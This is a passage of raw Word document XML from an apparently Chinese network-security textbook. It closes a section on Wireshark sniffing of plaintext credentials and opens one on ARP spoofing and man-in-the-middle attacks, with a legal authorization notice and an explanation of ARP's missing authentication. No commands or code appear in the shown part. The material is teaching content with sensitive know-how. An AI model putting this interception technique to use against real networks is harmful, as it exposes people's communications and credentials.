        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">USER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令出现的帧编号。最后使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打开同一文件，尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Statistics → Protocol Hierarchy”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看协议分布，直观理解流量组成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireshark/tshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是网络分析的基础工具，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libpcap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抓取完整以太网帧，可以深入解析每一层协议。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">混杂模式允许网卡收取所有帧，但在交换网络中可见性受限，真正的全流量嗅探通常需结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗或硬件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TAP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">显示过滤器与跟踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流是高效定位敏感信息的核心技能；明文协议（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础认证、FTP、Telnet）的凭据在抓包中毫无遮掩。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御的核心是强制加密传输（TLS/SSH），并配合网络准入、检测机制和最小权限分段，使被动嗅探失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对防御者而言，Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样是不可或缺的应急响应与威胁狩猎工具，结合统计功能与专家分析，能够从包级还原攻击行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanders, Chris.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3rd ed. No Starch Press. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以实际案例讲解如何用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排错和安全分析，是本节内容的绝佳进阶。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bejtlich, Richard.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Practice of Network Security Monitoring: Understanding Incident Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No Starch Press. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视角阐述如何利用全包捕获数据进行入侵检测，包含大量抓包分析案例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lyon, Gordon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Fyodor”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Network Scanning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参考，其中包含利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测嗅探器、混杂模式扫描的相关脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础与防火墙章节，为后续防御技术提供理论支撑。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="arp-欺骗与中间人检测防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗与中间人·检测防御·习题·小结·延伸</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[授权与隔离声明框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗与中间人（MITM）攻击命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅供读者在自建隔离实验室、官方授权靶机（HackTheBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / TryHackMe / VulnHub / OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）或已获得书面授权的系统上执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。实验网络必须与生产网络及互联网物理或逻辑隔离。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未经授权截获、篡改他人网络通信属于违法行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，情节严重者可构成破坏计算机信息系统罪。本书作者与出版社不对读者滥用技术造成的法律后果承担任何责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[依赖与交叉引用框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 24–25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章（以太网/ARP/MAC）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求/应答格式、MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址表、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存工作原理已在馆藏卷讲解。本节直接复用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议机理，在攻防场景中升级为欺骗攻击与防御。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章（TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">状态机）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接建立和断开过程是理解明文凭据嗅探的基础。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本书第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章（实验环境搭建）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：实验所需的虚拟化平台、靶机网络配置、攻击机准备已在该章涵盖。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本书第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">节（Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">流量分析）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的基本过滤语法、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流跟踪、明文协议识别是本节流量观察的前提技能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节揭示了被动嗅探的根本限制——在交换式网络中，仅仅开启混杂模式只能捕获广播、多播以及发往本机的单播帧，其他主机间的通信对嗅探器完全不可见。本节将在此基础上，展示攻击者如何通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗主动瓦解这一隔离前提，将受害者的单播流量重定向至自己手中，从而使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“全双工中间人嗅探”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成为可能。同时，防御者也会从本节学到如何通过多层机制检测和挫败</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层攻击，为第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节所强调的“加密使嗅探失效”提供有力补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者的视角看，局域网通信建立在一个隐含的信任模型之上——当主机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">想与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的主机通信时，它首先需要知道该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，于是向局域网广播一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“谁有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">？请告诉我你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。局域网内的任何主机都可以响应这个请求，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发出请求的主机会无条件地接受并缓存第一个收到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。问题在于，ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议在设计之初未包含任何认证机制——没有签名，没有随机数挑战，没有对“声称自己是某</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP”的主机进行身份验证。这就是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗（ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Spoofing / ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Poisoning）所攻击的协议假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机间的二层通信建立在“诚实应答”这一脆弱前提之上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者的视角看，ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗是局域网内最隐蔽也最难以根除的威胁之一。由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文工作在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二层，不经过路由器，不留下三层日志，传统的网络入侵检测系统往往对其视而不见。防御的核心思路不是修补</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身（这需要在全网部署如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SEND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等协议扩展，部署成本极高），而是在交换机和终端上建立对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可信验证机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：交换机能“看到”DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
